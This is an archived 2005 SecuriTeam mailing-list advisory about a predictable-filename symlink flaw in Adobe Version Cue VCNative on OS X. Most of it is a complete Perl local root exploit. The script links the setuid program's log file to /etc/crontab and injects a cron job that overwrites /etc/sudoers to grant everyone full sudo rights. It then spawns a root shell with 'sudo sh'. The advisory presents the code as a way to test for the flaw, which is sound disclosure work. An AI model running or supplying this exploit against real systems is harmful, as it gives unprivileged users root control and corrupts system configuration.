[EXPL] Adobe Version Cue VCNative Symlink Attack (Exploit)

• Previous message: SecuriTeam: "[TOOL] NotSPIKEfile - Linux Based File Format Fuzzing Tool"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 5 Sep 2005 11:06:11 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Adobe Version Cue VCNative Symlink Attack (Exploit)
------------------------------------------------------------------------

SUMMARY

" <http://www.adobe.com/products/creativesuite/versioncue.html> Adobe
Version Cue is a software version tracking system for Adobe products
distributed with Adobe Creative Suite and select Adobe products."

Lack of random name generation allows attackers to perform a symlink
attack using Adobe Version Cue VCNative, the following exploit code can be
used to test your system for the mentioned vulnerability.

DETAILS

Vulnerable Systems:
 * Adobe Version Cue version 1 on the Apple OS X platform

Exploit:
------------------------ xosx-adobe-vcnative.pl ------------------------

#!/usr/bin/perl
#
# Adobe Version Cue VCNative[OSX]: local root exploit.
#
# by: vade79/v9 v9 at fakehalo.us (fakehalo/realhalo)
#
# Adobe Version Cue's VCNative program writes data to a log file in
# the current working directory while running as (setuid) root. the
# logfile is formated as <cwd>/VCNative-<pid>.log, which is easily
# predictable. you may link this file to any file on the system
# and overwrite its contents. use of the "-host" option (with
# "-port") will allow user-supplied data to be injected into the
# file.
#
# This exploit works by overwriting /etc/crontab with
# '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and
# log garbage. within a short period of time crontab will overwrite
# /etc/sudoers and "sudo sh" to root is possible. this method is used
# because direct overwriting of /etc/sudoers will cause sudo to exit
# with configuration errors due to the log garbage, whereas crontab
# will ignore it. (this exploit requires both cron to be running and
# sudo to exist--this is generally default osx)

use POSIX;

$vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" .
 "WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative";
$vcn_pid=($$ + 1);
$vcn_cwd="/tmp";
$vcn_tempfile="$vcn_cwd/VCNative-$vcn_pid\.log";
$ovrfile="/etc/crontab";
$ovrstr="* * * * * root echo \\\"ALL ALL=(ALL) ALL\\\">/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
if(!-f $vcn_path){
 pexit("VCNative binary doesn't appear to exist");
}
if(!-f"/etc/crontab"||!-f"/etc/sudoers"){
 pexit("/etc/crontab and /etc/sudoers are required for this to work");
}
print("[*] sym-linking $ovrfile -> $vcn_tempfile.\n");
symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files.");
@ast=stat($ovrfile);
print("[*] running VCNative...\n");
system("\"$vcn_path\" -cwd $vcn_cwd -port 1 -host \"\n\n$ovrstr\n\n\"");
print("[*] removing $vcn_tempfile...\n");
unlink($vcn_tempfile);
@st=stat($ovrfile);
if($st[7]==$ast[7]&&$st[9]==$ast[9]){
 pexit("$ovrfile was not modified, exploit failed");
}
else{
 print("[*] $ovrfile was overwritten successfully...\n");
}
print("[*] waiting for crontab to change /etc/sudoers...\n");
@ast=@st=stat("/etc/sudoers");
while($st[7]==$ast[7]&&$st[9]==$ast[9]){
 sleep(1);
 @ast=stat("/etc/sudoers");
}
print("[*] /etc/sudoers has been modified.\n");
print("[*] attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");
exit(0);
# EoF

ADDITIONAL INFORMATION

The information has been provided by <mailto:v9@fakehalo.us> v9.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[TOOL] NotSPIKEfile - Linux Based File Format Fuzzing Tool"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]